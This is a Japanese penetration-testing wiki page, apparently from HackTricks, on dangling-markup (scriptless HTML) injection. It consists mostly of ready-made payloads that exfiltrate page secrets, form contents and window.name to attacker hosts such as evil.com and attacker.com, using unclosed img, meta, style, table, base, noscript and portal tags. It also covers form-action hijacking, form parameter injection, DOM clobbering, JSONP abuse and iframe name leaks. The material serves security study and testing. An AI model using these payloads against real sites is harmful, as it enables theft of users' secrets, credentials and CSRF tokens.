# ダングリングマークアップ - HTMLスクリプトレスインジェクション

{{#include ../../banners/hacktricks-training.md}}

## 概要

この技術は、**HTMLインジェクションが見つかった場合**にユーザーから情報を抽出するために使用できます。これは、**[**XSS**](../xss-cross-site-scripting/index.html)**を悪用する方法が見つからない場合でも、**いくつかのHTMLタグを注入できる**場合に非常に便利です。\
また、HTML内に**秘密が平文で保存されている**場合に、それをクライアントから**抽出**したり、スクリプトの実行を誤導したりするのにも役立ちます。

ここでコメントされているいくつかの技術は、情報を予期しない方法（HTMLタグ、CSS、HTTPメタタグ、フォーム、ベースなど）で抽出することによって、いくつかの**[**コンテンツセキュリティポリシー**](../content-security-policy-csp-bypass/index.html)**を回避するために使用できます。

## 主なアプリケーション

### 平文の秘密を盗む

ページが読み込まれるときに`<img src='http://evil.com/log.cgi?`を注入すると、被害者は注入された`img`タグと次の引用符の間のすべてのコードを送信します。そのチャンクに秘密が含まれている場合、あなたはそれを盗むことになります（ダブルクオートを使用して同じことを行うこともできます。どちらがより興味深いかを見てみてください）。

`img`タグが禁止されている場合（例えばCSPのため）、`<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`を使用することもできます。
```html
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
```
注意してください、**Chromeは"<"または"\n"を含むHTTP URLをブロックします**。そのため、"ftp"のような他のプロトコルスキームを試すことができます。

また、CSS `@import`を悪用することもできます（";"を見つけるまで全てのコードを送信します）。
```html
<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;
```
あなたはまた**`<table`**を使用することもできます:
```html
<table background='//your-collaborator-id.burpcollaborator.net?'
```
`<base` タグを挿入することもできます。すべての情報は引用が閉じられるまで送信されますが、ユーザーの操作が必要です（ユーザーはリンクをクリックする必要があります。なぜなら、base タグがリンクが指すドメインを変更するからです）。
```html
<base target='        <--- Injected
steal me'<b>test</b>
```
### フォームの盗難
```html
<base href="http://evil.com/" />
```
次に、データをパスに送信するフォーム（例えば `<form action='update_profile.php'>`）は、悪意のあるドメインにデータを送信します。

### フォームの盗難 2

フォームヘッダーを設定します：`<form action='http://evil.com/log_steal'>` これにより、次のフォームヘッダーが上書きされ、フォームからのすべてのデータが攻撃者に送信されます。

### フォームの盗難 3

ボタンは、属性 "formaction" を使用して、フォームの情報が送信されるURLを変更できます：
```html
<button name="xss" type="submit" formaction="https://google.com">
I get consumed!
</button>
```
攻撃者はこれを使用して情報を盗むことができます。

この攻撃の[**例はこの文書にあります**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。

### プレーンテキストの秘密を盗む 2

最新の技術を使用してフォームを盗む（新しいフォームヘッダーを注入する）ことで、新しい入力フィールドを注入することができます：
```html
<input type='hidden' name='review_body' value="
```
この入力フィールドには、HTML内の二重引用符の間のすべてのコンテンツと次の二重引用符が含まれます。この攻撃は、"_**Stealing clear text secrets**_" と "_**Stealing forms2**_" を組み合わせます。

同じことを、フォームと `<option>` タグを注入することで行うことができます。閉じた `</option>` が見つかるまでのすべてのデータが送信されます：
```html
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
```
### フォームパラメータインジェクション

フォームのパスを変更し、新しい値を挿入することで、予期しないアクションが実行されるようにできます:
```html
<form action="/change_settings.php">
<input type="hidden" name="invite_user" value="fredmbogo" /> ← Injected lines

<form action="/change_settings.php">
← Existing form (ignored by the parser) ...
<input type="text" name="invite_user" value="" /> ← Subverted field ...
<input type="hidden" name="xsrf_token" value="12345" />
...
</form>
</form>
```
### ノースクリプトを介したクリアテキストシークレットの盗難

`<noscript></noscript>` は、ブラウザがJavaScriptをサポートしていない場合にその内容が解釈されるタグです（Chromeでは [chrome://settings/content/javascript](chrome://settings/content/javascript) でJavaScriptを有効/無効にできます）。

攻撃者が制御するサイトに対して、注入ポイントからページの内容を抽出する方法は、これを注入することです：
```html
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
```
### ユーザーインタラクションを用いたCSPのバイパス

この[portswiggersの研究](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)から、**最もCSPが制限された**環境でも、**ユーザーインタラクション**を用いることで**データを抽出**できることがわかります。この場合、ペイロードを使用します:
```html
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='
```
注意してください、あなたは**犠牲者**に**リンクをクリック**させ、そのリンクが**あなたが制御するペイロード**に**リダイレクト**されるようにします。また、**`base`**タグ内の**`target`**属性は次のシングルクォートまでの**HTMLコンテンツ**を含むことに注意してください。\
これにより、リンクがクリックされた場合の**`window.name`**の**値**はすべてその**HTMLコンテンツ**になります。したがって、あなたがリンクをクリックすることで犠牲者がアクセスしているページを**制御**しているため、その**`window.name`**にアクセスし、そのデータを**抽出**することができます。
```html
<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>
```
### 誤解を招くスクリプトワークフロー 1 - HTML 名前空間攻撃

HTML内に新しいタグを挿入し、そのIDが次のものを上書きし、スクリプトの流れに影響を与える値を持つようにします。この例では、情報が誰と共有されるかを選択しています：
```html
<input type="hidden" id="share_with" value="fredmbogo" /> ← Injected markup ...
Share this status update with: ← Legitimate optional element of a dialog
<input id="share_with" value="" />

... function submit_status_update() { ... request.share_with =
document.getElementById('share_with').value; ... }
```
### 誤解を招くスクリプトワークフロー 2 - スクリプトネームスペース攻撃

HTMLタグを挿入することで、JavaScriptネームスペース内に変数を作成します。次に、この変数がアプリケーションのフローに影響を与えます：
```html
<img id="is_public" /> ← Injected markup ... // Legitimate application code
follows function retrieve_acls() { ... if (response.access_mode == AM_PUBLIC) ←
The subsequent assignment fails in IE is_public = true; else is_public = false;
} function submit_new_acls() { ... if (is_public) request.access_mode =
AM_PUBLIC; ← Condition always evaluates to true ... }
```
### JSONPの悪用

JSONPインターフェースを見つけた場合、任意のデータで任意の関数を呼び出すことができるかもしれません:
```html
<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })
```
また、いくつかのjavascriptを実行してみることもできます:
```html
<script src="/search?q=a&call=alert(1)"></script>
```
### Iframeの悪用

子ドキュメントは、クロスオリジンの状況でも親の`location`プロパティを表示および変更する能力を持っています。これにより、クライアントを任意のページにリダイレクトできる**iframe**内にスクリプトを埋め込むことが可能になります：
```html
<html>
<head></head>
<body>
<script>
top.window.location = "https://attacker.com/hacked.html"
</script>
</body>
</html>
```
これを軽減するには、次のようなものを使用できます: `sandbox=' allow-scripts allow-top-navigation'`

iframeは、**iframeのname属性を使用して**、別のページから機密情報を漏洩させるためにも悪用される可能性があります。これは、HTMLインジェクションを悪用して**機密情報がiframeのname属性内に表示される**ようにするiframeを作成でき、そのnameを最初のiframeからアクセスして漏洩させることができるためです。
```html
<script>
function cspBypass(win) {
win[0].location = "about:blank"
setTimeout(() => alert(win[0].name), 500)
}
</script>

<iframe
src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27"
onload="cspBypass(this.contentWindow)"></iframe>
```
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)

### \<metaの悪用

**`meta http-equiv`** を使用して、Cookieを設定するなどの**いくつかのアクション**を実行できます: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` またはリダイレクトを実行することができます（この場合は5秒後）: `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`

これは、**http-equiv** に関する **CSP** で**回避**できます（ `Content-Security-Policy: default-src 'self';` または `Content-Security-Policy: http-equiv 'self';`）

### 新しい \<portal HTML タグ

\<portal タグの脆弱性に関する非常に**興味深い研究**を[こちら](https://research.securitum.com/security-analysis-of-portal-element/)で見つけることができます。\
この文書を書いている時点では、`chrome://flags/#enable-portals` でポータルタグを有効にする必要があります。そうしないと機能しません。
```html
<portal src='https://attacker-server?
```
### HTML Leaks

HTMLにおける接続漏洩のすべての方法がDangling Markupに役立つわけではありませんが、時には助けになることがあります。ここで確認してください: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)

## SS-Leaks

これは**dangling markupとXS-Leaksの** **ミックス**です。一方で、この脆弱性は**同じオリジン**のページに**HTML**（ただしJSではない）を**注入**することを許可します。他方では、HTMLを注入できるページを**直接攻撃**するのではなく、**別のページ**を攻撃します。

{{#ref}}
ss-leaks.md
{{#endref}}

## XS-Search/XS-Leaks

XS-Searchは**サイドチャネル攻撃**を悪用して**クロスオリジン情報を抽出**することを目的としています。したがって、これはDangling Markupとは異なる技術ですが、一部の技術はHTMLタグの挿入（JS実行の有無にかかわらず）を悪用します。例えば、[**CSS Injection**](../xs-search/index.html#css-injection)や[**Lazy Load Images**](../xs-search/index.html#image-lazy-loading)**です。**

{{#ref}}
../xs-search/
{{#endref}}

## Brute-Force Detection List

{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt
{{#endref}}

## References

- [https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057](https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057)
- [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)
- [http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/](http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/)
- [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)

{{#include ../../banners/hacktricks-training.md}}